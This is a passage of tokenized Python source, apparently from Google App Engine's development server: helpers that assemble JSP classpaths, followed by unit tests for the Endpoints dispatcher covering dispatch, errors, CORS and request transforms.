'<STR_LIT>' ) <EOL> classes_dir = os . path . join ( web_inf , '<STR_LIT>' ) <EOL> jarfile . Make ( classes_dir , lib_dir , _CLASSES_JAR_NAME_PREFIX , <EOL> maximum_size = _MAX_COMPILED_JSP_JAR_SIZE ) <EOL> shutil . rmtree ( classes_dir ) <EOL> os . mkdir ( classes_dir ) <EOL> @ staticmethod <EOL> def _GetJspClasspath ( tools_dir , classes_dir , gen_dir ) : <EOL> """<STR_LIT>""" <EOL> lib_dir = os . path . join ( os . path . dirname ( classes_dir ) , '<STR_LIT>' ) <EOL> elements = ( <EOL> GetImplLibs ( tools_dir ) + GetSharedLibFiles ( tools_dir ) + <EOL> [ classes_dir , gen_dir ] + <EOL> _FilesMatching ( <EOL> lib_dir , lambda f : f . endswith ( '<STR_LIT>' ) or f . endswith ( '<STR_LIT>' ) ) ) <EOL> return ( os . pathsep ) . join ( elements ) <EOL> @ staticmethod <EOL> def _MatchingFileExists ( regex , dir_path ) : <EOL> for _ , _ , files in os . walk ( dir_path ) : <EOL> for f in files : <EOL> if re . search ( regex , f ) : <EOL> return True <EOL> return False <EOL> def GetImplLibs ( tools_dir ) : <EOL> return _GetLibsShallow ( os . path . join ( tools_dir , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> def GetSharedLibFiles ( tools_dir ) : <EOL> return _GetLibsRecursive ( os . path . join ( tools_dir , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> def GetUserJspLibFiles ( tools_dir ) : <EOL> return _GetLibsRecursive ( <EOL> os . path . join ( tools_dir , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> def GetSharedJspLibFiles ( tools_dir ) : <EOL> return _GetLibsRecursive ( <EOL> os . path . join ( tools_dir , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> def _GetLibsRecursive ( dir_path ) : <EOL> return _FilesMatching ( dir_path , lambda f : f . endswith ( '<STR_LIT>' ) ) <EOL> def _GetLibsShallow ( dir_path ) : <EOL> libs = [ ] <EOL> for f in os . listdir ( dir_path ) : <EOL> if os . path . isfile ( os . path . join ( dir_path , f ) ) and f . endswith ( '<STR_LIT>' ) : <EOL> libs . append ( os . path . join ( dir_path , f ) ) <EOL> return libs <EOL> def _FilesMatching ( root , predicate = lambda f : True ) : <EOL> """<STR_LIT>""" <EOL> matches = [ ] <EOL> for path , _ , files in os . walk ( root ) : <EOL> matches += [ os . path . join ( path , f ) for f in files if predicate ( f ) ] <EOL> return matches <EOL> def _FindApiJars ( lib_dir ) : <EOL> """<STR_LIT>""" <EOL> result = { } <EOL> for jar_file in _FilesMatching ( lib_dir , lambda f : f . endswith ( '<STR_LIT>' ) ) : <EOL> manifest = jarfile . ReadManifest ( jar_file ) <EOL> if manifest : <EOL> section = manifest . sections . get ( '<STR_LIT>' ) <EOL> if section and '<STR_LIT>' in section : <EOL> result [ jar_file ] = section [ '<STR_LIT>' ] <EOL> return result </s>
<s> """<STR_LIT>""" <EOL> import httplib <EOL> import json <EOL> import logging <EOL> import unittest <EOL> import google <EOL> import mox <EOL> from google . appengine . tools . devappserver2 import dispatcher <EOL> from google . appengine . tools . devappserver2 . endpoints import api_config_manager <EOL> from google . appengine . tools . devappserver2 . endpoints import api_request <EOL> from google . appengine . tools . devappserver2 . endpoints import discovery_api_proxy <EOL> from google . appengine . tools . devappserver2 . endpoints import endpoints_server <EOL> from google . appengine . tools . devappserver2 . endpoints import errors <EOL> from google . appengine . tools . devappserver2 . endpoints import test_utils <EOL> class JsonMatches ( mox . Comparator ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , json_object ) : <EOL> """<STR_LIT>""" <EOL> self . _json_object = json_object <EOL> def equals ( self , json_string ) : <EOL> """<STR_LIT>""" <EOL> other_json = json . loads ( json_string ) <EOL> return self . _json_object == other_json <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % self . _json_object <EOL> class DevAppserverEndpointsServerTest ( test_utils . TestsWithStartResponse ) : <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( DevAppserverEndpointsServerTest , self ) . setUp ( ) <EOL> self . mox = mox . Mox ( ) <EOL> self . config_manager = api_config_manager . ApiConfigManager ( ) <EOL> self . mock_dispatcher = self . mox . CreateMock ( dispatcher . Dispatcher ) <EOL> self . server = endpoints_server . EndpointsDispatcher ( self . mock_dispatcher , <EOL> self . config_manager ) <EOL> def tearDown ( self ) : <EOL> self . mox . UnsetStubs ( ) <EOL> def prepare_dispatch ( self , config ) : <EOL> request_method = '<STR_LIT:POST>' <EOL> request_path = '<STR_LIT>' <EOL> request_headers = [ ( '<STR_LIT:Content-Type>' , '<STR_LIT:application/json>' ) ] <EOL> request_body = '<STR_LIT:{}>' <EOL> response_body = json . dumps ( { '<STR_LIT>' : [ config ] } ) <EOL> self . mock_dispatcher . add_request ( <EOL> request_method , request_path , request_headers , request_body , <EOL> endpoints_server . _SERVER_SOURCE_IP ) . AndReturn ( <EOL> dispatcher . ResponseTuple ( '<STR_LIT>' , <EOL> [ ( '<STR_LIT:Content-Type>' , '<STR_LIT:application/json>' ) , <EOL> ( '<STR_LIT>' , <EOL> str ( len ( response_body ) ) ) ] , <EOL> response_body ) ) <EOL> def assert_dispatch_to_spi ( self , request , config , spi_path , <EOL> expected_spi_body_json = None ) : <EOL> """<STR_LIT>""" <EOL> self . prepare_dispatch ( config ) <EOL> spi_headers = [ ( '<STR_LIT:Content-Type>' , '<STR_LIT:application/json>' ) ] <EOL> spi_body_json = expected_spi_body_json or { } <EOL> spi_response = dispatcher . ResponseTuple ( '<STR_LIT>' , [ ] , '<STR_LIT>' ) <EOL> self . mock_dispatcher . add_request ( <EOL> '<STR_LIT:POST>' , spi_path , spi_headers , JsonMatches ( spi_body_json ) , <EOL> request . source_ip ) . AndReturn ( spi_response ) <EOL> self . mox . StubOutWithMock ( self . server , '<STR_LIT>' ) <EOL> self . server . handle_spi_response ( <EOL> mox . IsA ( api_request . ApiRequest ) , mox . IsA ( api_request . ApiRequest ) , <EOL> spi_response , mox . IsA ( dict ) , self . start_response ) . AndReturn ( '<STR_LIT>' ) <EOL> self . mox . ReplayAll ( ) <EOL> response = self . server . dispatch ( request , self . start_response ) <EOL> self . mox . VerifyAll ( ) <EOL> self . assertEqual ( '<STR_LIT>' , response ) <EOL> def test_dispatch_invalid_path ( self ) : <EOL> config = json . dumps ( { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT:version>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:GET>' , <EOL> '<STR_LIT:path>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> } <EOL> } ) <EOL> request = test_utils . build_request ( '<STR_LIT>' ) <EOL> self . prepare_dispatch ( config ) <EOL> self . mox . ReplayAll ( ) <EOL> response = self . server . dispatch ( request , self . start_response ) <EOL> self . mox . VerifyAll ( ) <EOL> self . assert_http_match ( response , <NUM_LIT> , <EOL> [ ( '<STR_LIT:Content-Type>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) ] , <EOL> '<STR_LIT>' ) <EOL> def test_dispatch_invalid_enum ( self ) : <EOL> config = json . dumps ( { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT:version>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:GET>' , <EOL> '<STR_LIT:path>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:body>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { '<STR_LIT>' : { '<STR_LIT>' : { '<STR_LIT:X>' : { '<STR_LIT>' : '<STR_LIT:X>' } } , <EOL> '<STR_LIT:type>' : '<STR_LIT:string>' <EOL> } <EOL> } <EOL> } <EOL> } <EOL> } <EOL> } ) <EOL> request = test_utils . build_request ( <EOL> '<STR_LIT>' ) <EOL> self . prepare_dispatch ( config ) <EOL> self . mox . ReplayAll ( ) <EOL> response = self . server . dispatch ( request , self . start_response ) <EOL> self . mox . VerifyAll ( ) <EOL> logging . warning ( '<STR_LIT>' , self . server . config_manager . configs ) <EOL> self . assertEqual ( self . response_status , '<STR_LIT>' ) <EOL> body = '<STR_LIT>' . join ( response ) <EOL> body_json = json . loads ( body ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( body_json [ '<STR_LIT:error>' ] [ '<STR_LIT>' ] ) ) <EOL> self . assertEqual ( '<STR_LIT>' , body_json [ '<STR_LIT:error>' ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT:location>' ] ) <EOL> self . assertEqual ( '<STR_LIT>' , <EOL> body_json [ '<STR_LIT:error>' ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> def test_dispatch_spi_error ( self ) : <EOL> """<STR_LIT>""" <EOL> config = json . dumps ( { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT:version>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:GET>' , <EOL> '<STR_LIT:path>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> } <EOL> } ) <EOL> request = test_utils . build_request ( '<STR_LIT>' ) <EOL> self . prepare_dispatch ( config ) <EOL> self . mox . StubOutWithMock ( self . server , '<STR_LIT>' ) <EOL> response = dispatcher . ResponseTuple ( '<STR_LIT>' , [ ] , <EOL> ( '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> self . server . call_spi ( request , mox . IgnoreArg ( ) ) . AndRaise ( <EOL> errors . BackendError ( response ) ) <EOL> self . mox . ReplayAll ( ) <EOL> response = self . server . dispatch ( request , self . start_response ) <EOL> self . mox . VerifyAll ( ) <EOL> expected_response = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT:}>' ) <EOL> response = '<STR_LIT>' . join ( response ) <EOL> self . assert_http_match ( response , '<STR_LIT>' , <EOL> [ ( '<STR_LIT>' , '<STR_LIT>' % len ( expected_response ) ) , <EOL> ( '<STR_LIT:Content-Type>' , '<STR_LIT:application/json>' ) ] , <EOL> expected_response ) <EOL> def test_dispatch_rpc_error ( self ) : <EOL> """<STR_LIT>""" <EOL> config = json . dumps ( { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT:version>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:GET>' , <EOL> '<STR_LIT:path>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> } <EOL> } ) <EOL> request = test_utils . build_request ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> self . prepare_dispatch ( config ) <EOL> self . mox . StubOutWithMock ( self . server , '<STR_LIT>' ) <EOL> response = dispatcher . ResponseTuple ( '<STR_LIT>' , [ ] , <EOL> ( '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> self . server . call_spi ( request , mox . IgnoreArg ( ) ) . AndRaise ( <EOL> errors . BackendError ( response ) ) <EOL> self . mox . ReplayAll ( ) <EOL> response = self . server . dispatch ( request , self . start_response ) <EOL> self . mox . VerifyAll ( ) <EOL> expected_response = { '<STR_LIT:error>' : { '<STR_LIT:code>' : <NUM_LIT> , <EOL> '<STR_LIT:message>' : '<STR_LIT>' , <EOL> '<STR_LIT:data>' : [ { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:message>' : '<STR_LIT>' , <EOL> } ] <EOL> } , <EOL> '<STR_LIT:id>' : '<STR_LIT>' <EOL> } <EOL> response = '<STR_LIT>' . join ( response ) <EOL> self . assertEqual ( '<STR_LIT>' , self . response_status ) <EOL> self . assertEqual ( expected_response , json . loads ( response ) ) <EOL> def test_dispatch_json_rpc ( self ) : <EOL> config = json . dumps ( { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT:version>' : '<STR_LIT:X>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:GET>' , <EOL> '<STR_LIT:path>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> } <EOL> } ) <EOL> request = test_utils . build_request ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> self . assert_dispatch_to_spi ( request , config , <EOL> '<STR_LIT>' ) <EOL> def test_dispatch_rest ( self ) : <EOL> config = json . dumps ( { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT:version>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:bar>' : { <EOL> '<STR_LIT>' : '<STR_LIT:GET>' , <EOL> '<STR_LIT:path>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> } <EOL> } ) <EOL> request = test_utils . build_request ( '<STR_LIT>' ) <EOL> self . assert_dispatch_to_spi ( request , config , <EOL> '<STR_LIT>' , <EOL> { '<STR_LIT:id>' : '<STR_LIT>' } ) <EOL> def test_explorer_redirect ( self ) : <EOL> request = test_utils . build_request ( '<STR_LIT>' ) <EOL> response = self . server . dispatch ( request , self . start_response ) <EOL> self . assert_http_match ( response , <NUM_LIT> , <EOL> [ ( '<STR_LIT>' , '<STR_LIT:0>' ) , <EOL> ( '<STR_LIT>' , ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) ) ] , <EOL> '<STR_LIT>' ) <EOL> def test_static_existing_file ( self ) : <EOL> relative_url = '<STR_LIT>' <EOL> discovery_api = self . mox . CreateMock ( <EOL> discovery_api_proxy . DiscoveryApiProxy ) <EOL> self . mox . StubOutWithMock ( discovery_api_proxy , '<STR_LIT>' ) <EOL> discovery_api_proxy . DiscoveryApiProxy ( ) . AndReturn ( discovery_api ) <EOL> static_response = self . mox . CreateMock ( httplib . HTTPResponse ) <EOL> static_response . status = <NUM_LIT:200> <EOL> static_response . reason = '<STR_LIT:OK>' <EOL> static_response . getheader ( '<STR_LIT:Content-Type>' ) . AndReturn ( '<STR_LIT>' ) <EOL> test_body = '<STR_LIT>' <EOL> discovery_api . get_static_file ( relative_url ) . AndReturn ( <EOL> ( static_response , test_body ) ) <EOL> request = test_utils . build_request ( relative_url ) <EOL> self . mox . ReplayAll ( ) <EOL> response = self . server . dispatch ( request , self . start_response ) <EOL> self . mox . VerifyAll ( ) <EOL> response = '<STR_LIT>' . join ( response ) <EOL> self . assert_http_match ( response , '<STR_LIT>' , <EOL> [ ( '<STR_LIT>' , '<STR_LIT>' % len ( test_body ) ) , <EOL> ( '<STR_LIT:Content-Type>' , '<STR_LIT>' ) ] , <EOL> test_body ) <EOL> def test_static_non_existing_file ( self ) : <EOL> relative_url = '<STR_LIT>' <EOL> discovery_api = self . mox . CreateMock ( <EOL> discovery_api_proxy . DiscoveryApiProxy ) <EOL> self . mox . StubOutWithMock ( discovery_api_proxy , '<STR_LIT>' ) <EOL> discovery_api_proxy . DiscoveryApiProxy ( ) . AndReturn ( discovery_api ) <EOL> static_response = self . mox . CreateMock ( httplib . HTTPResponse ) <EOL> static_response . status = <NUM_LIT> <EOL> static_response . reason = '<STR_LIT>' <EOL> static_response . getheaders ( ) . AndReturn ( [ ( '<STR_LIT:Content-Type>' , '<STR_LIT>' ) ] ) <EOL> test_body = '<STR_LIT>' <EOL> discovery_api . get_static_file ( relative_url ) . AndReturn ( <EOL> ( static_response , test_body ) ) <EOL> request = test_utils . build_request ( relative_url ) <EOL> self . mox . ReplayAll ( ) <EOL> response = self . server . dispatch ( request , self . start_response ) <EOL> self . mox . VerifyAll ( ) <EOL> response = '<STR_LIT>' . join ( response ) <EOL> self . assert_http_match ( response , '<STR_LIT>' , <EOL> [ ( '<STR_LIT>' , '<STR_LIT>' % len ( test_body ) ) , <EOL> ( '<STR_LIT:Content-Type>' , '<STR_LIT>' ) ] , <EOL> test_body ) <EOL> def test_handle_non_json_spi_response ( self ) : <EOL> orig_request = test_utils . build_request ( '<STR_LIT>' ) <EOL> spi_request = orig_request . copy ( ) <EOL> spi_response = dispatcher . ResponseTuple ( <EOL> <NUM_LIT:200> , [ ( '<STR_LIT>' , '<STR_LIT>' ) ] , <EOL> '<STR_LIT>' ) <EOL> response = self . server . handle_spi_response ( orig_request , spi_request , <EOL> spi_response , { } , <EOL> self . start_response ) <EOL> error_json = { '<STR_LIT:error>' : { '<STR_LIT:message>' : <EOL> '<STR_LIT>' } } <EOL> body = json . dumps ( error_json ) <EOL> self . assert_http_match ( response , '<STR_LIT>' , <EOL> [ ( '<STR_LIT:Content-Type>' , '<STR_LIT:application/json>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' % len ( body ) ) ] , <EOL> body ) <EOL> def test_handle_non_json_spi_response_cors ( self ) : <EOL> """<STR_LIT>""" <EOL> server_response = dispatcher . ResponseTuple ( <EOL> '<STR_LIT>' , [ ( '<STR_LIT>' , '<STR_LIT>' ) ] , <EOL> '<STR_LIT>' ) <EOL> response = self . check_cors ( [ ( '<STR_LIT>' , '<STR_LIT>' ) ] , True , '<STR_LIT>' , <EOL> server_response = server_response ) <EOL> self . assertEqual ( <EOL> { '<STR_LIT:error>' : { '<STR_LIT:message>' : '<STR_LIT>' } } , <EOL> json . loads ( response ) ) <EOL> def check_cors ( self , request_headers , expect_response , expected_origin = None , <EOL> expected_allow_headers = None , server_response = None ) : <EOL> """<STR_LIT>""" <EOL> orig_request = test_utils . build_request ( '<STR_LIT>' , <EOL> http_headers = request_headers ) <EOL> spi_request = orig_request . copy ( ) <EOL> if server_response is None : <EOL> server_response = dispatcher . ResponseTuple ( <EOL> '<STR_LIT>' , [ ( '<STR_LIT>' , '<STR_LIT:application/json>' ) ] , '<STR_LIT:{}>' ) <EOL> response = self . server . handle_spi_response ( orig_request , spi_request , <EOL> server_response , { } , <EOL> self . start_response ) <EOL> headers = dict ( self . response_headers ) <EOL> if expect_response : <EOL> self . assertIn ( endpoints_server . _CORS_HEADER_ALLOW_ORIGIN , headers ) <EOL> self . assertEqual ( <EOL> headers [ endpoints_server . _CORS_HEADER_ALLOW_ORIGIN ] , <EOL> expected_origin ) <EOL> self . assertIn ( endpoints_server . _CORS_HEADER_ALLOW_METHODS , headers ) <EOL> self . assertEqual ( set ( headers [ <EOL> endpoints_server . _CORS_HEADER_ALLOW_METHODS ] . split ( '<STR_LIT:U+002C>' ) ) , <EOL> endpoints_server . _CORS_ALLOWED_METHODS ) <EOL> if expected_allow_headers is not None : <EOL> self . assertIn ( endpoints_server . _CORS_HEADER_ALLOW_HEADERS , <EOL> headers ) <EOL> self . assertEqual ( <EOL> headers [ endpoints_server . _CORS_HEADER_ALLOW_HEADERS ] , <EOL> expected_allow_headers ) <EOL> else : <EOL> self . assertNotIn ( endpoints_server . _CORS_HEADER_ALLOW_HEADERS , <EOL> headers ) <EOL> else : <EOL> self . assertNotIn ( endpoints_server . _CORS_HEADER_ALLOW_ORIGIN , <EOL> headers ) <EOL> self . assertNotIn ( endpoints_server . _CORS_HEADER_ALLOW_METHODS , <EOL> headers ) <EOL> self . assertNotIn ( endpoints_server . _CORS_HEADER_ALLOW_HEADERS , <EOL> headers ) <EOL> return '<STR_LIT>' . join ( response ) <EOL> def test_handle_cors ( self ) : <EOL> """<STR_LIT>""" <EOL> self . check_cors ( [ ( '<STR_LIT>' , '<STR_LIT>' ) ] , True , '<STR_LIT>' ) <EOL> def test_handle_cors_preflight ( self ) : <EOL> """<STR_LIT>""" <EOL> self . check_cors ( [ ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:GET>' ) ] , True , <EOL> '<STR_LIT>' ) <EOL> def test_handle_cors_preflight_invalid ( self ) : <EOL> """<STR_LIT>""" <EOL> self . check_cors ( [ ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) ] , False ) <EOL> def test_handle_cors_preflight_request_headers ( self ) : <EOL> """<STR_LIT>""" <EOL> self . check_cors ( [ ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:GET>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) ] , True , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_lily_uses_python_method_name ( self ) : <EOL> """<STR_LIT>""" <EOL> config = json . dumps ( { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT:version>' : '<STR_LIT:X>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:GET>' , <EOL> '<STR_LIT:path>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> } <EOL> } ) <EOL> request = test_utils . build_request ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> self . assert_dispatch_to_spi ( request , config , <EOL> '<STR_LIT>' , <EOL> { } ) <EOL> def test_handle_spi_response_json_rpc ( self ) : <EOL> """<STR_LIT>""" <EOL> orig_request = test_utils . build_request ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertTrue ( orig_request . is_rpc ( ) ) <EOL> orig_request . request_id = '<STR_LIT>' <EOL> spi_request = orig_request . copy ( ) <EOL> spi_response = dispatcher . ResponseTuple ( '<STR_LIT>' , [ ( '<STR_LIT:a>' , '<STR_LIT:b>' ) ] , <EOL> '<STR_LIT>' ) <EOL> response = self . server . handle_spi_response ( orig_request , spi_request , <EOL> spi_response , { } , <EOL> self . start_response ) <EOL> response = '<STR_LIT>' . join ( response ) <EOL> self . assertEqual ( self . response_status , '<STR_LIT>' ) <EOL> self . assertIn ( ( '<STR_LIT:a>' , '<STR_LIT:b>' ) , self . response_headers ) <EOL> self . assertEqual ( { '<STR_LIT:id>' : '<STR_LIT>' , '<STR_LIT:result>' : { '<STR_LIT>' : '<STR_LIT>' } } , <EOL> json . loads ( response ) ) <EOL> def test_handle_spi_response_batch_json_rpc ( self ) : <EOL> """<STR_LIT>""" <EOL> orig_request = test_utils . build_request ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertTrue ( orig_request . is_batch ( ) ) <EOL> self . assertTrue ( orig_request . is_rpc ( ) ) <EOL> orig_request . request_id = '<STR_LIT>' <EOL> spi_request = orig_request . copy ( ) <EOL> spi_response = dispatcher . ResponseTuple ( '<STR_LIT>' , [ ( '<STR_LIT:a>' , '<STR_LIT:b>' ) ] , <EOL> '<STR_LIT>' ) <EOL> response = self . server . handle_spi_response ( orig_request , spi_request , <EOL> spi_response , { } , <EOL> self . start_response ) <EOL> response = '<STR_LIT>' . join ( response ) <EOL> self . assertEqual ( self . response_status , '<STR_LIT>' ) <EOL> self . assertIn ( ( '<STR_LIT:a>' , '<STR_LIT:b>' ) , self . response_headers ) <EOL> self . assertEqual ( [ { '<STR_LIT:id>' : '<STR_LIT>' , '<STR_LIT:result>' : { '<STR_LIT>' : '<STR_LIT>' } } ] , <EOL> json . loads ( response ) ) <EOL> def test_handle_spi_response_rest ( self ) : <EOL> orig_request = test_utils . build_request ( '<STR_LIT>' , '<STR_LIT:{}>' ) <EOL> spi_request = orig_request . copy ( ) <EOL> body = json . dumps ( { '<STR_LIT>' : '<STR_LIT>' } , indent = <NUM_LIT:1> ) <EOL> spi_response = dispatcher . ResponseTuple ( '<STR_LIT>' , [ ( '<STR_LIT:a>' , '<STR_LIT:b>' ) ] , body ) <EOL> response = self . server . handle_spi_response ( orig_request , spi_request , <EOL> spi_response , { } , <EOL> self . start_response ) <EOL> self . assert_http_match ( response , '<STR_LIT>' , <EOL> [ ( '<STR_LIT:a>' , '<STR_LIT:b>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' % len ( body ) ) ] , <EOL> body ) <EOL> def test_transform_rest_response ( self ) : <EOL> """<STR_LIT>""" <EOL> orig_response = '<STR_LIT>' <EOL> expected_response = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT:}>' ) <EOL> self . assertEqual ( expected_response , <EOL> self . server . transform_rest_response ( orig_response ) ) <EOL> def test_transform_json_rpc_response_batch ( self ) : <EOL> """<STR_LIT>""" <EOL> orig_request = test_utils . build_request ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> request = orig_request . copy ( ) <EOL> request . request_id = '<STR_LIT>' <EOL> orig_response = '<STR_LIT>' <EOL> response = self . server . transform_jsonrpc_response ( request , orig_response ) <EOL> self . assertEqual ( [ { '<STR_LIT:result>' : { '<STR_LIT>' : '<STR_LIT:body>' } , '<STR_LIT:id>' : '<STR_LIT>' } ] , <EOL> json . loads ( response ) ) <EOL> def test_lookup_rpc_method_no_body ( self ) : <EOL> orig_request = test_utils . build_request ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertEqual ( None , self . server . lookup_rpc_method ( orig_request ) ) <EOL> def test_lookup_rpc_method ( self ) : <EOL> self . mox . StubOutWithMock ( self . server . config_manager , '<STR_LIT>' ) <EOL> self . server . config_manager . lookup_rpc_method ( '<STR_LIT:foo>' , '<STR_LIT>' ) . AndReturn ( '<STR_LIT:bar>' ) <EOL> self . mox . ReplayAll ( ) <EOL> orig_request = test_utils . build_request ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertEqual ( '<STR_LIT:bar>' , self . server . lookup_rpc_method ( orig_request ) ) <EOL> self . mox . VerifyAll ( ) <EOL> def test_verify_response ( self ) : <EOL> response = dispatcher . ResponseTuple ( '<STR_LIT>' , [ ( '<STR_LIT:Content-Type>' , '<STR_LIT:a>' ) ] , '<STR_LIT>' ) <EOL> self . assertEqual ( True , self . server . verify_response ( response , <NUM_LIT:200> , '<STR_LIT:a>' ) ) <EOL> self . assertEqual ( True , self . server . verify_response ( response , <NUM_LIT:200> , None ) ) <EOL> self . assertEqual ( False , self . server . verify_response ( response , <NUM_LIT> , '<STR_LIT:a>' ) ) <EOL> self . assertEqual ( False , self . server . verify_response ( response , <NUM_LIT:200> , '<STR_LIT:b>' ) ) <EOL> response = dispatcher . ResponseTuple ( '<STR_LIT>' , [ ( '<STR_LIT>' , '<STR_LIT>' ) ] , '<STR_LIT>' ) <EOL> self . assertEqual ( True , self . server . verify_response ( response , <NUM_LIT:200> , None ) ) <EOL> self . assertEqual ( False , self . server . verify_response ( response , <NUM_LIT:200> , '<STR_LIT:a>' ) ) <EOL> def test_check_empty_response ( self ) : <EOL> """<STR_LIT>""" <EOL> orig_request = test_utils . build_request ( '<STR_LIT>' , '<STR_LIT:{}>' ) <EOL> method_config = { '<STR_LIT>' : { '<STR_LIT:body>' : '<STR_LIT>' } } <EOL> empty_response = self . server . check_empty_response ( orig_request , <EOL> method_config , <EOL> self . start_response ) <EOL> self . assert_http_match ( empty_response , <NUM_LIT> , [ ( '<STR_LIT>' , '<STR_LIT:0>' ) ] , '<STR_LIT>' ) <EOL> def test_check_non_empty_response ( self ) : <EOL> """<STR_LIT>""" <EOL> orig_request = test_utils . build_request ( '<STR_LIT>' , '<STR_LIT:{}>' ) <EOL> method_config = { '<STR_LIT>' : { '<STR_LIT:body>' : '<STR_LIT>' } } <EOL> empty_response = self . server . check_empty_response ( orig_request , <EOL> method_config , <EOL> self . start_response ) <EOL> self . assertIsNone ( empty_response ) <EOL> self . assertIsNone ( self . response_status ) <EOL> self . assertIsNone ( self . response_headers ) <EOL> self . assertIsNone ( self . response_exc_info ) <EOL> class TransformRequestTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( TransformRequestTests , self ) . setUp ( ) <EOL> self . mox = mox . Mox ( ) <EOL> self . config_manager = api_config_manager . ApiConfigManager ( ) <EOL> self . mock_dispatcher = self . mox . CreateMock ( dispatcher . Dispatcher ) <EOL> self . server = endpoints_server . EndpointsDispatcher ( self . mock_dispatcher , <EOL> self . config_manager ) <EOL> def tearDown ( self ) : <EOL> self . mox . UnsetStubs ( ) <EOL> def test_transform_request ( self ) : <EOL> """<STR_LIT>""" <EOL> request = test_utils . build_request ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> method_config = { '<STR_LIT>' : '<STR_LIT>' } <EOL> new_request = self . server . transform_request ( request , { '<STR_LIT>' : '<STR_LIT:X>' } , <EOL> method_config ) <EOL> self . assertEqual ( { '<STR_LIT>' : '<STR_LIT:body>' , '<STR_LIT>' : '<STR_LIT:X>' } , <EOL> json . loads ( new_request . body ) ) <EOL> self . assertEqual ( '<STR_LIT>' , new_request . path ) <EOL> def test_transform_json_rpc_request ( self ) : <EOL> """<STR_LIT>""" <EOL> orig_request = test_utils . build_request ( <EOL> 